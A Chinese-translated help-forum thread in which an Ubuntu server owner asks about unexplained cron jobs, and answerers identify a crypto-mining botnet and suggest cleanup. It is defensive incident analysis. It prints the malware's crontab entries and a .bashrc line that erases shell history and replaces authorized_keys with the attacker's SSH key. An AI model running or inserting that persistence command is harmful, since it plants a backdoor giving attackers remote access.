MCP*_*tor 28 server cron rsync
我不断收到 Weir cron 工作,但我不知道他们在做什么。我通常发出 kill -9 来阻止它们。它们占用了我 100% 的 CPU,并且可以运行数天,直到我检查为止。有谁知道这是什么意思?
sudo crontab -l
0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1
@reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1
5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1
@reboot /root/.firefoxcatche/b/sync>/dev/null 2>&1
#5 1 * * * /tmp/.X13-unix/.rsync/c/aptitude>/dev/null 2>&1
截至昨天 7/24/2019,我正在运行 Ubuntu 18 LTS 服务器
更新
我感谢所有的反馈。我已经断开了所有数据和应用程序驱动器的连接,因为唯一受影响的是操作系统驱动器,至少我正确地做了那种事情。我将进行完整的重建,使用更多的安全性和更安全的方法。
小智 45
您的机器很可能感染了加密矿工。你可以在 Azure 中使用安全中心的虚拟机的真实检测中看到其他人报告了类似的文件名和行为。另请参阅我的 Ubuntu 服务器有病毒...我找到了它,但我无法摆脱它...在 Reddit 上。
您不能再信任那台机器,应该重新安装它。小心还原备份。
小智 10
您的机器已感染了加密矿工攻击。我过去也遇到过类似的勒索软件攻击,我的数据库遭到破坏。我为机器进行了 SQL 转储并重新配置了机器(因为我的机器是托管在 AWS EC2 上的虚拟机)。我还修改了机器的安全组以锁定 SSH 访问和修改的密码。我还启用了日志记录以记录查询并将其导出到 S3 每晚。
我也发生了同样的情况,我昨天注意到了。我检查了文件/var/log/syslog,这个 IP (185.234.218.40) 似乎正在自动执行 cronjobs。
我在http://whatismyipaddress.com ( https://whatismyipaddress.com/ip/185.234.218.40 )上查看了它,它有一些报告。这些文件被木马编辑过:
我在结束时发现了这一点.bashrc(每次打开 bash 时都会执行):
set +o history
export PATH=/home/user/.bin:$PATH
cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod 700 .ssh && cd .ssh && chmod 600 authorized_keys && cd ~
它正在删除您的authorized_keys文件,这是一个 SSH 密钥列表,无需密码即可连接。然后,它添加攻击者的 SSH 密钥:
ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr
此外,我找到了这个文件夹:/tmp/.X13-unix/.rsync,所有恶意软件都在那里。我什至找到了一个文件,/tmp/.X13-unix/.rsync/c/ip一个包含 70 000 个 IP 地址的文件,这些地址很可能是其他受害者或节点服务器。
有两种解决方案: A:
添加防火墙阻止除端口 22 和其他您认为必要的其他外的所有传出连接,并启用 fail2ban,这是一个在 X 次密码尝试失败后禁止 IP 地址的程序
杀死所有 cron 作业:
ps aux | grep cron,然后杀死出现的 PID
将您的密码更改为安全密码
乙:
备份您需要或想要的任何文件或文件夹
重置服务器重新安装Ubuntu,或者直接新建一个Droplet
就像 Thom Wiggers 所说的,你肯定是比特币挖矿僵尸网络的一部分,你的服务器有一个后门。该后门使用了 perl 漏洞,该文件位于此处:/tmp/.X13-unix/.rsync/b/run,包含此 ( https://pastebin.com/ceP2jsUy )
我发现的最可疑的文件夹是:
/tmp/.X13-unix/.rsync
~/.bashrc (已编辑)
~/.firefoxcatche
最后,这里有一篇关于 Perl 后门的文章:https : //blog.trendmicro.com/trendlabs-security-intelligence/outlaw-hacking-groups-botnet-observed-spreading-miner-perl-based-backdoor/
希望这个对你有帮助。
| 归档时间: |
|
| 查看次数: |
11324 次 |
| 最近记录: |